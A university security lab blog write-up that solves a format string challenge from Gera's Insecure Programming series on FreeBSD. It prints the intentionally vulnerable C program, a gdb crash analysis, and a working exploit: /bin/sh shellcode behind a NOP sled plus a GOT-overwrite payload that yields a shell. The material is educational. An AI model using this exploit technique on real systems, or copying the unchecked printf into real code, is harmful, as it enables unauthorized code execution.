OSIRIS Lab at NYU Tandon

Gera's Insecure Programming Format String #4

Jun 27, 2011
- lixor_
1 minute read

One more completed challenge is needed before we can declare format strings dead. This challenge from the format string section of Gera’s Insecure Programming is basically solvable using the same approach as challenge #3.

I am going to keep this post brief. If you want a more detail description of the write-up see challenge #3 write-up.

Gera’s challenge is posted below and can be found here.

/* fs4.c                                        *
 * specially crafted to feed your brain by gera */

/* Have you ever heard about code reusability?  */

int main(int argv,char **argc) {
        char buf[256];

        snprintf(buf,sizeof buf,"%s%6$hn",argc[1]);
        printf(buf);
}

As you may notice the only different is that direct parameter access (“%6$hn”) is used in the format string. As usual, the targeted platform is FreeBSD 8.2-RELEASE.

> ./fs4 AAAABBBBCCCCDDDD
Segmentation fault (core dumped)
> gdb -q fs4 fs4.core
..snip..
#0  0x2816f329 in open () from /lib/libc.so.7
(gdb) x/i $eip
0x2816f329 <open+11965>:	mov    %dx,(%eax)
(gdb) printf "%p %p\n", $eax, $edx
0x44444444 0x10
(gdb) q
>

From here, the step are the same as #3. The only difference is that 16 bytes is needed to trigger the vulnerability.

> readelf -r fs4

Relocation section '.rel.plt' at offset 0x2b0 contains 5 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
080496ec  00000107 R_386_JUMP_SLOT   00000000   _init_tls
080496f0  00000407 R_386_JUMP_SLOT   00000000   printf
080496f4  00000507 R_386_JUMP_SLOT   00000000   snprintf
080496f8  00000607 R_386_JUMP_SLOT   00000000   exit
080496fc  00000807 R_386_JUMP_SLOT   00000000   atexit

Once again, we look for an address in the PLT and use exit’s address. The setup of the payload is the same as all previous write-ups: in the environmental variable. The environmental variable was found at 0xbfbd6905. In the payload of the environmental variable, we use the trap instruction (“\xcc”) to see if lands in the NOP-sled.

> setenv SHELLCODE `perl -e 'print "\x90"x65536 ."\xcc"x100000 ."\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"'`
> ./fs4 AAAABBBBCCCC`perl -e 'print "\xfa\x96\x04\x08"."A"x49069'`
Trace/BPT trap (core dumped)

We hit our trap instruction; therefore, simply exchange the “\xcc” with “\x90” and we should get a shell.

> setenv SHELLCODE `perl -e 'print "\x90"x65536 ."\x90"x100000 ."\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"'` 
> ./fs4 AAAABBBBCCCC`perl -e 'print "\xfa\x96\x04\x08"."A"x49069'`              
$

lixor_: 4 and format string (FS): 0